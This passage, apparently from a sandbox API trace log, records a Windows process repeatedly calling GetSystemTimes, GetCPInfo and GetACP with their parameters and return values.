lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.164] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.164] GetACP () returned 0x4e4 [0129.164] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.164] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.164] GetACP () returned 0x4e4 [0129.164] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.164] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.164] GetACP () returned 0x4e4 [0129.164] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.165] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.165] GetACP () returned 0x4e4 [0129.165] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.165] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.165] GetACP () returned 0x4e4 [0129.165] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.165] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.165] GetACP () returned 0x4e4 [0129.165] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.165] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.165] GetACP () returned 0x4e4 [0129.165] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.165] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.165] GetACP () returned 0x4e4 [0129.165] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.165] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.165] GetACP () returned 0x4e4 [0129.165] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.165] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.165] GetACP () returned 0x4e4 [0129.165] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.166] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.166] GetACP () returned 0x4e4 [0129.166] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.166] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.166] GetACP () returned 0x4e4 [0129.166] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.166] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.166] GetACP () returned 0x4e4 [0129.166] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.166] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.166] GetACP () returned 0x4e4 [0129.166] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.166] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.166] GetACP () returned 0x4e4 [0129.166] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.166] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.166] GetACP () returned 0x4e4 [0129.166] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.166] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.166] GetACP () returned 0x4e4 [0129.166] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.167] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.167] GetACP () returned 0x4e4 [0129.167] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.167] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.167] GetACP () returned 0x4e4 [0129.167] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.167] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.167] GetACP () returned 0x4e4 [0129.167] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.167] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.167] GetACP () returned 0x4e4 [0129.167] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.167] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.167] GetACP () returned 0x4e4 [0129.167] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.167] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.167] GetACP () returned 0x4e4 [0129.167] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.167] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.167] GetACP () returned 0x4e4 [0129.167] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.168] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.168] GetACP () returned 0x4e4 [0129.168] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.168] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.168] GetACP () returned 0x4e4 [0129.168] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.168] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.168] GetACP () returned 0x4e4 [0129.168] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.168] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.168] GetACP () returned 0x4e4 [0129.168] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.168] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.168] GetACP () returned 0x4e4 [0129.168] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.168] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.168] GetACP () returned 0x4e4 [0129.168] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.168] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.168] GetACP () returned 0x4e4 [0129.168] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.169] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.169] GetACP () returned 0x4e4 [0129.169] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.169] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.169] GetACP () returned 0x4e4 [0129.169] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.169] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.169] GetACP () returned 0x4e4 [0129.169] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.169] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.169] GetACP () returned 0x4e4 [0129.169] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.169] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.169] GetACP () returned 0x4e4 [0129.169] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.169] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.169] GetACP () returned 0x4e4 [0129.169] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.169] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.169] GetACP () returned 0x4e4 [0129.169] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.170] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.170] GetACP () returned 0x4e4 [0129.170] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.170] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.170] GetACP () returned 0x4e4 [0129.170] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.170] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.170] GetACP () returned 0x4e4 [0129.170] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.170] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.170] GetACP () returned 0x4e4 [0129.170] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.170] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.170] GetACP () returned 0x4e4 [0129.170] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.170] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.170] GetACP () returned 0x4e4 [0129.170] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.170] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.170] GetACP () returned 0x4e4 [0129.170] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.171] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.171] GetACP () returned 0x4e4 [0129.171] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.171] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.171] GetACP () returned 0x4e4 [0129.171] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.171] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.171] GetACP () returned 0x4e4 [0129.171] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.171] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.171] GetACP () returned 0x4e4 [0129.171] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.171] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.171] GetACP () returned 0x4e4 [0129.171] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.171] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.171] GetACP () returned 0x4e4 [0129.171] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.171] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.171] GetACP () returned 0x4e4 [0129.171] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.172] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.218] GetACP () returned 0x4e4 [0129.218] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.219] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.219] GetACP () returned 0x4e4 [0129.219] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.219] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.219] GetACP () returned 0x4e4 [0129.219] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.219] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.219] GetACP () returned 0x4e4 [0129.219] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.219] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.219] GetACP () returned 0x4e4 [0129.219] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.219] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.219] GetACP () returned 0x4e4 [0129.219] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.219] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.219] GetACP () returned 0x4e4 [0129.219] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.219] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.219] GetACP () returned 0x4e4 [0129.219] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.219] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.220] GetACP () returned 0x4e4 [0129.220] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.220] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.220] GetACP () returned 0x4e4 [0129.220] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.220] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.220] GetACP () returned 0x4e4 [0129.220] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.220] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.220] GetACP () returned 0x4e4 [0129.220] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.220] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.220] GetACP () returned 0x4e4 [0129.220] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.220] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.220] GetACP () returned 0x4e4 [0129.220] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.220] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.220] GetACP () returned 0x4e4 [0129.220] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.220] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.220] GetACP () returned 0x4e4 [0129.220] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.221] GetACP () returned 0x4e4 [0129.221] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.221] GetACP () returned 0x4e4 [0129.221] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.221] GetACP () returned 0x4e4 [0129.221] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.221] GetACP () returned 0x4e4 [0129.221] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.221] GetACP () returned 0x4e4 [0129.221] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.221] GetACP () returned 0x4e4 [0129.221] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.221] GetACP () returned 0x4e4 [0129.221] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, 